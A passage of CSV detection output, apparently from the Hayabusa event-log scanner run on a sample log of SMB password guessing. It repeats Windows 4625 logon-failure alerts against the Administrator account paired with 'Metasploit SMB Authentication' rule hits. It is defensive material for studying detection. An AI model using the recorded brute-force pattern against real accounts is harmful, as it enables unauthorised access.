Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 